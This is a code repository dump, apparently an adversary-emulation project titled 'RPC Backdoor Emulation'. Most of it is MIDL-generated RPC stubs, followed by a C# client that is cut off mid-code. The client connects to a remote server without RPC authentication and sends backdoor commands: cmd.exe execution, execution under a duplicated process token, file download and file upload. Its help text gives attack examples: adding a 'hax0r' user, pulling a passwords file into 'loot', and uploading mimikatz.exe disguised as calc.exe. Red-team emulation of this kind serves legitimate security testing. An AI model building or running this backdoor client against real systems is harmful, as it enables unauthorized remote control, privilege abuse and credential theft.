_RpcServerInterface2_MIDL_PROC_FORMAT_STRING 47 | { 48 | short Pad; 49 | unsigned char Format[ PROC_FORMAT_STRING_SIZE ]; 50 | } RpcServerInterface2_MIDL_PROC_FORMAT_STRING; 51 | 52 | typedef struct _RpcServerInterface2_MIDL_EXPR_FORMAT_STRING 53 | { 54 | long Pad; 55 | unsigned char Format[ EXPR_FORMAT_STRING_SIZE ]; 56 | } RpcServerInterface2_MIDL_EXPR_FORMAT_STRING; 57 | 58 | 59 | static const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax = 60 | {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}; 61 | 62 | static const RPC_SYNTAX_IDENTIFIER _NDR64_RpcTransferSyntax = 63 | {{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}}; 64 | 65 | 66 | 67 | extern const RpcServerInterface2_MIDL_TYPE_FORMAT_STRING RpcServerInterface2__MIDL_TypeFormatString; 68 | extern const RpcServerInterface2_MIDL_PROC_FORMAT_STRING RpcServerInterface2__MIDL_ProcFormatString; 69 | extern const 
RpcServerInterface2_MIDL_EXPR_FORMAT_STRING RpcServerInterface2__MIDL_ExprFormatString; 70 | 71 | #define GENERIC_BINDING_TABLE_SIZE 0 72 | 73 | 74 | /* Standard interface: RpcServerInterface2, ver. 1.0, 75 | GUID={0xfa161e81,0x6e93,0x4f41,{0x96,0x1c,0xee,0x9c,0x2e,0x75,0xde,0x18}} */ 76 | 77 | extern const MIDL_STUBLESS_PROXY_INFO RpcServerInterface2_ProxyInfo; 78 | handle_t hRpcServerInterface2Binding; 79 | 80 | 81 | static const RPC_CLIENT_INTERFACE RpcServerInterface2___RpcClientInterface = 82 | { 83 | sizeof(RPC_CLIENT_INTERFACE), 84 | {{0xfa161e81,0x6e93,0x4f41,{0x96,0x1c,0xee,0x9c,0x2e,0x75,0xde,0x18}},{1,0}}, 85 | {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}, 86 | 0, 87 | 0, 88 | 0, 89 | 0, 90 | &RpcServerInterface2_ProxyInfo, 91 | 0x02000000 92 | }; 93 | RPC_IF_HANDLE RpcServerInterface2_v1_0_c_ifspec = (RPC_IF_HANDLE)& RpcServerInterface2___RpcClientInterface; 94 | 95 | extern const MIDL_STUB_DESC RpcServerInterface2_StubDesc; 96 | 97 | static RPC_BINDING_HANDLE RpcServerInterface2__MIDL_AutoBindHandle; 98 | 99 | 100 | void Shutdown2( void) 101 | { 102 | 103 | NdrClientCall3( 104 | ( PMIDL_STUBLESS_PROXY_INFO )&RpcServerInterface2_ProxyInfo, 105 | 0, 106 | 0, 107 | 0); 108 | 109 | } 110 | 111 | 112 | #if !defined(__RPC_WIN64__) 113 | #error Invalid build platform for this stub. 
114 | #endif 115 | 116 | static const RpcServerInterface2_MIDL_PROC_FORMAT_STRING RpcServerInterface2__MIDL_ProcFormatString = 117 | { 118 | 0, 119 | { 120 | 121 | /* Procedure Shutdown2 */ 122 | 123 | 0x32, /* FC_BIND_PRIMITIVE */ 124 | 0x48, /* Old Flags: */ 125 | /* 2 */ NdrFcLong( 0x0 ), /* 0 */ 126 | /* 6 */ NdrFcShort( 0x0 ), /* 0 */ 127 | /* 8 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ 128 | /* 10 */ NdrFcShort( 0x0 ), /* 0 */ 129 | /* 12 */ NdrFcShort( 0x0 ), /* 0 */ 130 | /* 14 */ 0x40, /* Oi2 Flags: has ext, */ 131 | 0x0, /* 0 */ 132 | /* 16 */ 0xa, /* 10 */ 133 | 0x1, /* Ext Flags: new corr desc, */ 134 | /* 18 */ NdrFcShort( 0x0 ), /* 0 */ 135 | /* 20 */ NdrFcShort( 0x0 ), /* 0 */ 136 | /* 22 */ NdrFcShort( 0x0 ), /* 0 */ 137 | /* 24 */ NdrFcShort( 0x0 ), /* 0 */ 138 | 139 | 0x0 140 | } 141 | }; 142 | 143 | static const RpcServerInterface2_MIDL_TYPE_FORMAT_STRING RpcServerInterface2__MIDL_TypeFormatString = 144 | { 145 | 0, 146 | { 147 | NdrFcShort( 0x0 ), /* 0 */ 148 | 149 | 0x0 150 | } 151 | }; 152 | 153 | static const unsigned short RpcServerInterface2_FormatStringOffsetTable[] = 154 | { 155 | 0 156 | }; 157 | 158 | 159 | 160 | #endif /* defined(_M_AMD64)*/ 161 | 162 | 163 | 164 | /* this ALWAYS GENERATED file contains the RPC client stubs */ 165 | 166 | 167 | /* File created by MIDL compiler version 8.01.0622 */ 168 | /* at Mon Jan 18 21:14:07 2038 169 | */ 170 | /* Compiler settings for RpcServerInterface2.idl: 171 | Oicf, W4, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 172 | protocol : all , ms_ext, c_ext, robust 173 | error checks: allocation ref bounds_check enum stub_data 174 | VC __declspec() decoration level: 175 | __declspec(uuid()), __declspec(selectany), __declspec(novtable) 176 | DECLSPEC_UUID(), MIDL_INTERFACE() 177 | */ 178 | /* @@MIDL_FILE_HEADING( ) */ 179 | 180 | #if defined(_M_AMD64) 181 | 182 | 183 | 184 | 185 | #if !defined(__RPC_WIN64__) 186 | #error Invalid build platform for this stub. 
187 | #endif 188 | 189 | 190 | #include "ndr64types.h" 191 | #include "pshpack8.h" 192 | 193 | 194 | typedef 195 | struct 196 | { 197 | struct _NDR64_PROC_FORMAT frag1; 198 | } 199 | __midl_frag2_t; 200 | extern const __midl_frag2_t __midl_frag2; 201 | 202 | typedef 203 | NDR64_FORMAT_UINT32 204 | __midl_frag1_t; 205 | extern const __midl_frag1_t __midl_frag1; 206 | 207 | static const __midl_frag2_t __midl_frag2 = 208 | { 209 | /* Shutdown2 */ 210 | { 211 | /* Shutdown2 */ /* procedure Shutdown2 */ 212 | (NDR64_UINT32) 66 /* 0x42 */, /* primitive handle */ /* IsIntrepreted */ 213 | (NDR64_UINT32) 0 /* 0x0 */ , /* Stack size */ 214 | (NDR64_UINT32) 0 /* 0x0 */, 215 | (NDR64_UINT32) 0 /* 0x0 */, 216 | (NDR64_UINT16) 0 /* 0x0 */, 217 | (NDR64_UINT16) 0 /* 0x0 */, 218 | (NDR64_UINT16) 0 /* 0x0 */, 219 | (NDR64_UINT16) 0 /* 0x0 */ 220 | } 221 | }; 222 | 223 | static const __midl_frag1_t __midl_frag1 = 224 | (NDR64_UINT32) 0 /* 0x0 */; 225 | 226 | 227 | #include "poppack.h" 228 | 229 | 230 | static const FormatInfoRef RpcServerInterface2_Ndr64ProcTable[] = 231 | { 232 | &__midl_frag2 233 | }; 234 | 235 | 236 | static const MIDL_STUB_DESC RpcServerInterface2_StubDesc = 237 | { 238 | (void *)& RpcServerInterface2___RpcClientInterface, 239 | MIDL_user_allocate, 240 | MIDL_user_free, 241 | &hRpcServerInterface2Binding, 242 | 0, 243 | 0, 244 | 0, 245 | 0, 246 | RpcServerInterface2__MIDL_TypeFormatString.Format, 247 | 1, /* -error bounds_check flag */ 248 | 0x60001, /* Ndr library version */ 249 | 0, 250 | 0x801026e, /* MIDL Version 8.1.622 */ 251 | 0, 252 | 0, 253 | 0, /* notify & notify_flag routine table */ 254 | 0x2000001, /* MIDL flag */ 255 | 0, /* cs routines */ 256 | (void *)& RpcServerInterface2_ProxyInfo, /* proxy/server info */ 257 | 0 258 | }; 259 | 260 | static const MIDL_SYNTAX_INFO RpcServerInterface2_SyntaxInfo [ 2 ] = 261 | { 262 | { 263 | {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}, 264 | 0, 265 | 
RpcServerInterface2__MIDL_ProcFormatString.Format, 266 | RpcServerInterface2_FormatStringOffsetTable, 267 | RpcServerInterface2__MIDL_TypeFormatString.Format, 268 | 0, 269 | 0, 270 | 0 271 | } 272 | ,{ 273 | {{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}}, 274 | 0, 275 | 0 , 276 | (unsigned short *) RpcServerInterface2_Ndr64ProcTable, 277 | 0, 278 | 0, 279 | 0, 280 | 0 281 | } 282 | }; 283 | 284 | static const MIDL_STUBLESS_PROXY_INFO RpcServerInterface2_ProxyInfo = 285 | { 286 | &RpcServerInterface2_StubDesc, 287 | RpcServerInterface2__MIDL_ProcFormatString.Format, 288 | RpcServerInterface2_FormatStringOffsetTable, 289 | (RPC_SYNTAX_IDENTIFIER*)&_RpcTransferSyntax, 290 | 2, 291 | (MIDL_SYNTAX_INFO*)RpcServerInterface2_SyntaxInfo 292 | 293 | }; 294 | 295 | #if _MSC_VER >= 1200 296 | #pragma warning(pop) 297 | #endif 298 | 299 | 300 | #endif /* defined(_M_AMD64)*/ 301 | 302 | -------------------------------------------------------------------------------- /RpcServerInterface2/RpcServerInterface2_s.c: -------------------------------------------------------------------------------- 1 | 2 | 3 | /* this ALWAYS GENERATED file contains the RPC server stubs */ 4 | 5 | 6 | /* File created by MIDL compiler version 8.01.0622 */ 7 | /* at Mon Jan 18 21:14:07 2038 8 | */ 9 | /* Compiler settings for RpcServerInterface2.idl: 10 | Oicf, W4, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 11 | protocol : all , ms_ext, c_ext, robust 12 | error checks: allocation ref bounds_check enum stub_data 13 | VC __declspec() decoration level: 14 | __declspec(uuid()), __declspec(selectany), __declspec(novtable) 15 | DECLSPEC_UUID(), MIDL_INTERFACE() 16 | */ 17 | /* @@MIDL_FILE_HEADING( ) */ 18 | 19 | #if defined(_M_AMD64) 20 | 21 | 22 | #if _MSC_VER >= 1200 23 | #pragma warning(push) 24 | #endif 25 | 26 | #pragma warning( disable: 4211 ) /* redefine extern to static */ 27 | #pragma warning( disable: 4232 ) /* dllimport identity*/ 28 | #pragma warning( 
disable: 4024 ) /* array to pointer mapping*/ 29 | 30 | #include 31 | #include "RpcServerInterface2.h" 32 | 33 | #define TYPE_FORMAT_STRING_SIZE 3 34 | #define PROC_FORMAT_STRING_SIZE 27 35 | #define EXPR_FORMAT_STRING_SIZE 1 36 | #define TRANSMIT_AS_TABLE_SIZE 0 37 | #define WIRE_MARSHAL_TABLE_SIZE 0 38 | 39 | typedef struct _RpcServerInterface2_MIDL_TYPE_FORMAT_STRING 40 | { 41 | short Pad; 42 | unsigned char Format[ TYPE_FORMAT_STRING_SIZE ]; 43 | } RpcServerInterface2_MIDL_TYPE_FORMAT_STRING; 44 | 45 | typedef struct _RpcServerInterface2_MIDL_PROC_FORMAT_STRING 46 | { 47 | short Pad; 48 | unsigned char Format[ PROC_FORMAT_STRING_SIZE ]; 49 | } RpcServerInterface2_MIDL_PROC_FORMAT_STRING; 50 | 51 | typedef struct _RpcServerInterface2_MIDL_EXPR_FORMAT_STRING 52 | { 53 | long Pad; 54 | unsigned char Format[ EXPR_FORMAT_STRING_SIZE ]; 55 | } RpcServerInterface2_MIDL_EXPR_FORMAT_STRING; 56 | 57 | 58 | static const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax = 59 | {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}; 60 | 61 | static const RPC_SYNTAX_IDENTIFIER _NDR64_RpcTransferSyntax = 62 | {{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}}; 63 | 64 | 65 | extern const RpcServerInterface2_MIDL_TYPE_FORMAT_STRING RpcServerInterface2__MIDL_TypeFormatString; 66 | extern const RpcServerInterface2_MIDL_PROC_FORMAT_STRING RpcServerInterface2__MIDL_ProcFormatString; 67 | extern const RpcServerInterface2_MIDL_EXPR_FORMAT_STRING RpcServerInterface2__MIDL_ExprFormatString; 68 | 69 | /* Standard interface: RpcServerInterface2, ver. 
1.0, 70 | GUID={0xfa161e81,0x6e93,0x4f41,{0x96,0x1c,0xee,0x9c,0x2e,0x75,0xde,0x18}} */ 71 | 72 | 73 | extern const MIDL_SERVER_INFO RpcServerInterface2_ServerInfo; 74 | 75 | extern const RPC_DISPATCH_TABLE RpcServerInterface2_v1_0_DispatchTable; 76 | 77 | static const RPC_SERVER_INTERFACE RpcServerInterface2___RpcServerInterface = 78 | { 79 | sizeof(RPC_SERVER_INTERFACE), 80 | {{0xfa161e81,0x6e93,0x4f41,{0x96,0x1c,0xee,0x9c,0x2e,0x75,0xde,0x18}},{1,0}}, 81 | {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}, 82 | (RPC_DISPATCH_TABLE*)&RpcServerInterface2_v1_0_DispatchTable, 83 | 0, 84 | 0, 85 | 0, 86 | &RpcServerInterface2_ServerInfo, 87 | 0x06000000 88 | }; 89 | RPC_IF_HANDLE RpcServerInterface2_v1_0_s_ifspec = (RPC_IF_HANDLE)& RpcServerInterface2___RpcServerInterface; 90 | 91 | extern const MIDL_STUB_DESC RpcServerInterface2_StubDesc; 92 | 93 | 94 | #if !defined(__RPC_WIN64__) 95 | #error Invalid build platform for this stub. 96 | #endif 97 | 98 | static const RpcServerInterface2_MIDL_PROC_FORMAT_STRING RpcServerInterface2__MIDL_ProcFormatString = 99 | { 100 | 0, 101 | { 102 | 103 | /* Procedure Shutdown2 */ 104 | 105 | 0x32, /* FC_BIND_PRIMITIVE */ 106 | 0x48, /* Old Flags: */ 107 | /* 2 */ NdrFcLong( 0x0 ), /* 0 */ 108 | /* 6 */ NdrFcShort( 0x0 ), /* 0 */ 109 | /* 8 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ 110 | /* 10 */ NdrFcShort( 0x0 ), /* 0 */ 111 | /* 12 */ NdrFcShort( 0x0 ), /* 0 */ 112 | /* 14 */ 0x40, /* Oi2 Flags: has ext, */ 113 | 0x0, /* 0 */ 114 | /* 16 */ 0xa, /* 10 */ 115 | 0x1, /* Ext Flags: new corr desc, */ 116 | /* 18 */ NdrFcShort( 0x0 ), /* 0 */ 117 | /* 20 */ NdrFcShort( 0x0 ), /* 0 */ 118 | /* 22 */ NdrFcShort( 0x0 ), /* 0 */ 119 | /* 24 */ NdrFcShort( 0x0 ), /* 0 */ 120 | 121 | 0x0 122 | } 123 | }; 124 | 125 | static const RpcServerInterface2_MIDL_TYPE_FORMAT_STRING RpcServerInterface2__MIDL_TypeFormatString = 126 | { 127 | 0, 128 | { 129 | NdrFcShort( 0x0 ), /* 0 */ 130 | 131 | 0x0 132 | } 133 | }; 
134 | 135 | static const unsigned short RpcServerInterface2_FormatStringOffsetTable[] = 136 | { 137 | 0 138 | }; 139 | 140 | 141 | static const RPC_DISPATCH_FUNCTION RpcServerInterface2_table[] = 142 | { 143 | NdrServerCall2, 144 | 0 145 | }; 146 | static const RPC_DISPATCH_TABLE RpcServerInterface2_v1_0_DispatchTable = 147 | { 148 | 1, 149 | (RPC_DISPATCH_FUNCTION*)RpcServerInterface2_table 150 | }; 151 | 152 | 153 | #endif /* defined(_M_AMD64)*/ 154 | 155 | 156 | 157 | /* this ALWAYS GENERATED file contains the RPC server stubs */ 158 | 159 | 160 | /* File created by MIDL compiler version 8.01.0622 */ 161 | /* at Mon Jan 18 21:14:07 2038 162 | */ 163 | /* Compiler settings for RpcServerInterface2.idl: 164 | Oicf, W4, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 165 | protocol : all , ms_ext, c_ext, robust 166 | error checks: allocation ref bounds_check enum stub_data 167 | VC __declspec() decoration level: 168 | __declspec(uuid()), __declspec(selectany), __declspec(novtable) 169 | DECLSPEC_UUID(), MIDL_INTERFACE() 170 | */ 171 | /* @@MIDL_FILE_HEADING( ) */ 172 | 173 | #if defined(_M_AMD64) 174 | 175 | 176 | 177 | 178 | #if !defined(__RPC_WIN64__) 179 | #error Invalid build platform for this stub. 
180 | #endif 181 | 182 | 183 | #include "ndr64types.h" 184 | #include "pshpack8.h" 185 | 186 | 187 | typedef 188 | struct 189 | { 190 | struct _NDR64_PROC_FORMAT frag1; 191 | } 192 | __midl_frag2_t; 193 | extern const __midl_frag2_t __midl_frag2; 194 | 195 | typedef 196 | NDR64_FORMAT_UINT32 197 | __midl_frag1_t; 198 | extern const __midl_frag1_t __midl_frag1; 199 | 200 | static const __midl_frag2_t __midl_frag2 = 201 | { 202 | /* Shutdown2 */ 203 | { 204 | /* Shutdown2 */ /* procedure Shutdown2 */ 205 | (NDR64_UINT32) 66 /* 0x42 */, /* primitive handle */ /* IsIntrepreted */ 206 | (NDR64_UINT32) 0 /* 0x0 */ , /* Stack size */ 207 | (NDR64_UINT32) 0 /* 0x0 */, 208 | (NDR64_UINT32) 0 /* 0x0 */, 209 | (NDR64_UINT16) 0 /* 0x0 */, 210 | (NDR64_UINT16) 0 /* 0x0 */, 211 | (NDR64_UINT16) 0 /* 0x0 */, 212 | (NDR64_UINT16) 0 /* 0x0 */ 213 | } 214 | }; 215 | 216 | static const __midl_frag1_t __midl_frag1 = 217 | (NDR64_UINT32) 0 /* 0x0 */; 218 | 219 | 220 | #include "poppack.h" 221 | 222 | 223 | static const FormatInfoRef RpcServerInterface2_Ndr64ProcTable[] = 224 | { 225 | &__midl_frag2 226 | }; 227 | 228 | 229 | static const MIDL_STUB_DESC RpcServerInterface2_StubDesc = 230 | { 231 | (void *)& RpcServerInterface2___RpcServerInterface, 232 | MIDL_user_allocate, 233 | MIDL_user_free, 234 | 0, 235 | 0, 236 | 0, 237 | 0, 238 | 0, 239 | RpcServerInterface2__MIDL_TypeFormatString.Format, 240 | 1, /* -error bounds_check flag */ 241 | 0x60001, /* Ndr library version */ 242 | 0, 243 | 0x801026e, /* MIDL Version 8.1.622 */ 244 | 0, 245 | 0, 246 | 0, /* notify & notify_flag routine table */ 247 | 0x2000001, /* MIDL flag */ 248 | 0, /* cs routines */ 249 | (void *)& RpcServerInterface2_ServerInfo, /* proxy/server info */ 250 | 0 251 | }; 252 | 253 | static const RPC_DISPATCH_FUNCTION RpcServerInterface2_NDR64__table[] = 254 | { 255 | NdrServerCallAll, 256 | 0 257 | }; 258 | static const RPC_DISPATCH_TABLE RpcServerInterface2_NDR64__v1_0_DispatchTable = 259 | { 260 | 1, 261 | 
(RPC_DISPATCH_FUNCTION*)RpcServerInterface2_NDR64__table 262 | }; 263 | 264 | static const MIDL_SYNTAX_INFO RpcServerInterface2_SyntaxInfo [ 2 ] = 265 | { 266 | { 267 | {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}, 268 | (RPC_DISPATCH_TABLE*)&RpcServerInterface2_v1_0_DispatchTable, 269 | RpcServerInterface2__MIDL_ProcFormatString.Format, 270 | RpcServerInterface2_FormatStringOffsetTable, 271 | RpcServerInterface2__MIDL_TypeFormatString.Format, 272 | 0, 273 | 0, 274 | 0 275 | } 276 | ,{ 277 | {{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}}, 278 | (RPC_DISPATCH_TABLE*)&RpcServerInterface2_NDR64__v1_0_DispatchTable, 279 | 0 , 280 | (unsigned short *) RpcServerInterface2_Ndr64ProcTable, 281 | 0, 282 | 0, 283 | 0, 284 | 0 285 | } 286 | }; 287 | 288 | 289 | static const SERVER_ROUTINE RpcServerInterface2_ServerRoutineTable[] = 290 | { 291 | (SERVER_ROUTINE)Shutdown2 292 | }; 293 | 294 | static const MIDL_SERVER_INFO RpcServerInterface2_ServerInfo = 295 | { 296 | &RpcServerInterface2_StubDesc, 297 | RpcServerInterface2_ServerRoutineTable, 298 | RpcServerInterface2__MIDL_ProcFormatString.Format, 299 | (unsigned short *) RpcServerInterface2_FormatStringOffsetTable, 300 | 0, 301 | (RPC_SYNTAX_IDENTIFIER*)&_NDR64_RpcTransferSyntax, 302 | 2, 303 | (MIDL_SYNTAX_INFO*)RpcServerInterface2_SyntaxInfo 304 | }; 305 | #if _MSC_VER >= 1200 306 | #pragma warning(pop) 307 | #endif 308 | 309 | 310 | #endif /* defined(_M_AMD64)*/ 311 | 312 | -------------------------------------------------------------------------------- /RpcSharpClient/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /RpcSharpClient/ILMerge.props: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | true 12 | 13 | 14 | 15 | 16 | 17 | 18 | 
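--------------------------------------------------------------------------------
/RpcSharpClient/ILMergeOrder.txt:
--------------------------------------------------------------------------------
1 | # this file contains the partial list of the merged assemblies in the merge order
2 | # you can fill it from the obj\CONFIG\PROJECT.ilmerge generated on every build
3 | # and finetune merge order to your satisfaction
4 |
5 |
--------------------------------------------------------------------------------
/RpcSharpClient/Program.cs:
--------------------------------------------------------------------------------
using System;
using System.IO;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using rpc_fa161e81_6e93_4f41_961c_ee9c2e75de17_1_0;

namespace RpcSharpClient
{
    /// <summary>
    /// Command-line client for the emulation RPC server: parses flag/value pairs,
    /// binds to the server over TCP or a named pipe and issues a single call.
    /// </summary>
    internal class Program
    {
        /// <summary>
        /// Writes the usage text (target options, supported functions, examples) to standard output.
        /// </summary>
        static void PrintHelp()
        {
            Console.Write("RPC Backdoor Emulation\n");
            Console.Write("\n");
            Console.Write("Target information:\n");
            Console.Write(" --protocol\n");
            Console.Write(" Can be 'tcp' for RPC over TCP/IP or 'namedpipe' for RPC over Named Pipes \n");
            Console.Write(" --hostname\n");
            Console.Write(" Specifies the hostname or IP address of the target RPC server\n");
            Console.Write(" --port\n");
            Console.Write(" Specifies the port number of the target RPC server (required for TCP)\n");
            Console.Write(" --pipename\n");
            Console.Write(" Specifies the pipe name of the target RPC server (required for named pipes)\n");
            Console.Write("\n");
            Console.Write("Functions:\n");
            Console.Write(" The function to be executed is passed via the --function argument.\n");
            Console.Write(" The following functions are implemented:\n");
            Console.Write(" * execute\n");
            Console.Write(" * executewithtoken\n");
            Console.Write(" * download\n");
            Console.Write(" * upload\n");
            Console.Write(" * shutdown\n");
            Console.Write(" \n");
            Console.Write(" Execute\n");
            Console.Write(" The execute function executes a command using 'cmd.exe /c ...'.\n");
            Console.Write(" The --command argument is required. If the commands contains any spaces, wrap it in double quotes (\").\n");
            Console.Write(" \n");
            Console.Write(" Execute with token\n");
            Console.Write(" The execute with token function duplicates the token of a given process ID and executes a command using 'cmd.exe /c ...' via the CreateProcessWithTokenW function.\n");
            Console.Write(" The --command argument is required. If the commands contains any spaces, wrap it in double quotes (\").\n");
            Console.Write(" The --pid argument is required. This argument specifies the process ID of which the token will be duplicated. Make sure the RPC server run in a security context with the permissions and privileges required.\n");
            Console.Write(" \n");
            Console.Write(" Download\n");
            Console.Write(" The download function downloads a file from the RPC server and saves it locally. The file is Base64 encoded/decoded in the process.\n");
            Console.Write(" The --remotepath argument specifies the path of the file to be downloaded (used by the server to read the file).\n");
            Console.Write(" The --localpath argument specifies the path of the file to be saved (used by the client to save the file).\n");
            Console.Write("\n");
            Console.Write(" Upload\n");
            Console.Write(" The upload function uploaded a file to the RPC server and saves it remotely. The file is Base64 encoded/decoded in the process.\n");
            Console.Write(" The --remotepath argument specifies the path of the file to be uploaded (used by the server to save the file).\n");
            Console.Write(" The --localpath argument specifies the path of the file to be uploaded (used by the client to read the file).\n");
            Console.Write(" \n");
            Console.Write(" Shutdown\n");
            Console.Write(" The shutdown function instructs the RPC server to terminate the RPC server and exit the thread.\n");
            Console.Write(" \n");
            Console.Write("Examples:\n");
            Console.Write(" Execute a command:\n");
            Console.Write(" RpcSharpClient.exe --protocol namedpipe --hostname 192.168.70.130 --pipename \"\\pipe\\atctl\" --function execute --command \"net user hax0r /add\"\n");
            Console.Write(" \n");
            Console.Write(" Execute a command with the token of a process with the ID 1220:\n");
            Console.Write(" RpcSharpClient.exe --protocol tcp --hostname 192.168.70.130 --port 4747 --function executewithtoken --command \"net user hax0r /add\" --pid 1220\n");
            Console.Write(" \n");
            Console.Write(" Download a file:\n");
            Console.Write(" RpcSharpClient.exe --protocol namedpipe --hostname 192.168.70.130 --pipename \"\\pipe\\atctl\" --function download --localpath \"loot\\passwords.txt\" --remotepath \"secrets\\passwords.txt\"\n");
            Console.Write(" \n");
            Console.Write(" Upload a file:\n");
            Console.Write(" RpcSharpClient.exe --protocol namedpipe --hostname 192.168.70.130 --pipename \"\\pipe\\atctl\" --function upload --localpath \"Tools\\mimikatz.exe\" --remotepath \"calc.exe\"\n");
        }


        /// <summary>
        /// Parses the command line, validates it, connects to the RPC server and issues the requested call.
        /// </summary>
        /// <remarks>
        /// All validation happens before any connection is opened, so a malformed command line
        /// never produces network traffic. Errors are reported on standard output.
        /// </remarks>
        /// <param name="args">Flag/value pairs as described by <see cref="PrintHelp"/>.</param>
        static void Main(string[] args)
        {
            string protocol = null;
            string endpoint = null;
            string hostname = null;
            string function = null;
            string command = null;
            string pid = null;
            string remotepath = null;
            string localpath = null;
            string protocol_seq;
            int processId = 0;

            // If not enough arguments are provided, print help and exit
            if (args.Length < 2)
            {
                PrintHelp();
                return;
            }

            // Parse command line arguments; every flag is expected to be followed by a value
            for (int i = 0; i < args.Length; i += 2)
            {
                if (i + 1 >= args.Length)
                {
                    Console.WriteLine("Error: Incorrect number of arguments. See instructions below.");
                    PrintHelp();
                    return;
                }

                string value = args[i + 1];

                // switch on a string compares ordinally, so look-alike flags containing
                // characters that a culture-sensitive comparison ignores are not accepted.
                switch (args[i])
                {
                    case "--protocol":
                        protocol = value;
                        break;
                    case "--pipename":
                    case "--port":
                        // Both flags feed the same endpoint; the last one given wins.
                        endpoint = value;
                        break;
                    case "--hostname":
                        hostname = value;
                        break;
                    case "--function":
                        function = value;
                        break;
                    case "--command":
                        command = value;
                        break;
                    case "--pid":
                        pid = value;
                        break;
                    case "--remotepath":
                        remotepath = value;
                        break;
                    case "--localpath":
                        localpath = value;
                        break;
                    case "--data":
                        // Accepted for command-line compatibility; no function reads it.
                        break;
                    default:
                        // Unrecognised flags are skipped together with their value.
                        break;
                }
            }

            // Map the protocol to an RPC protocol sequence; both need a hostname and an endpoint
            switch (protocol)
            {
                case "tcp":
                    if (hostname == null || endpoint == null)
                    {
                        Console.WriteLine("Error: TCP requires providing a hostname/IP address and a port. See instructions below.");
                        PrintHelp();
                        return;
                    }
                    protocol_seq = "ncacn_ip_tcp";
                    break;
                case "namedpipe":
                    if (endpoint == null || hostname == null)
                    {
                        Console.WriteLine("Error: Named pipe requires providing a hostname and a pipe name. See instructions below.");
                        PrintHelp();
                        return;
                    }
                    protocol_seq = "ncacn_np";
                    break;
                default:
                    // Without this the protocol sequence would stay null and only fail inside Connect.
                    Console.WriteLine("Error: The --protocol argument must be 'tcp' or 'namedpipe'. See instructions below.");
                    PrintHelp();
                    return;
            }

            // Check the function and its required arguments before touching the network
            switch (function)
            {
                case "execute":
                    if (command == null)
                    {
                        Console.WriteLine("Error: The execute command requires providing a command. See instructions below.");
                        PrintHelp();
                        return;
                    }
                    break;
                case "executewithtoken":
                    if (command == null || pid == null)
                    {
                        Console.WriteLine("Error: The executewithtoken command requires providing a command and a process id (pid). See instructions below.");
                        PrintHelp();
                        return;
                    }
                    if (int.TryParse(pid, out processId) == false)
                    {
                        Console.WriteLine("Invalid process ID was provided: {0}", pid);
                        return;
                    }
                    break;
                case "download":
                    if (localpath == null || remotepath == null)
                    {
                        Console.WriteLine("Error: The download command requires providing a remote path (remotepath) for the file to download and a local path (localpath) where the file will be saved. See instructions below.");
                        PrintHelp();
                        return;
                    }
                    break;
                case "upload":
                    if (localpath == null || remotepath == null)
                    {
                        Console.WriteLine("Error: The upload command requires providing a local path (localpath) for the file to upload and a remote path (remotepath) where the file will be saved on the remote system. See instructions below.");
                        PrintHelp();
                        return;
                    }
                    break;
                case "shutdown":
                    // The shutdown call doesn't require any additional arguments
                    break;
                default:
                    Console.WriteLine("Error: The --function argument must be one of execute, executewithtoken, download, upload or shutdown. See instructions below.");
                    PrintHelp();
                    return;
            }

            // Establish a connection.
            // The binding requests no RPC authentication (RpcAuthenticationLevel.None), so the RPC
            // layer itself adds no signing or encryption to the calls made below.
            Client client = new Client();
            NtApiDotNet.SecurityQualityOfService qos = new NtApiDotNet.SecurityQualityOfService(
                NtApiDotNet.SecurityImpersonationLevel.Identification,
                NtApiDotNet.SecurityContextTrackingMode.Static,
                false);
            NtApiDotNet.Win32.Rpc.Transport.RpcTransportSecurity rts = new NtApiDotNet.Win32.Rpc.Transport.RpcTransportSecurity(qos);
            rts.AuthenticationLevel = NtApiDotNet.Win32.Rpc.Transport.RpcAuthenticationLevel.None;
            try
            {
                client.Connect(protocol_seq, endpoint, hostname, rts);
            }
            catch (Exception e)
            {
                // Stop here: issuing calls on a client that never connected only yields a second, misleading error.
                Console.WriteLine("Failed to establish a connection: {0}", e.Message);
                return;
            }

            try
            {
                switch (function)
                {
                    case "execute":
                    {
                        string output = "";
                        Console.WriteLine("[+] Sending Execute command: {0}", command);
                        client.Execute(command, out output);
                        Console.WriteLine("[+] Execute command result: {0}", output);
                        break;
                    }
                    case "executewithtoken":
                    {
                        string output = "";
                        Console.WriteLine("[+] Sending Execute command: {0}", command);
                        client.ExecuteWithToken(command, processId, out output);
                        Console.WriteLine("[+] Execute command result: {0}", output);
                        break;
                    }
                    case "download":
                    {
                        string encoded = null;
                        Console.WriteLine("[+] Sending Download command: {0}", remotepath);
                        client.Download(remotepath, out encoded);
                        Console.WriteLine("[+] Saving to file: {0}", localpath);
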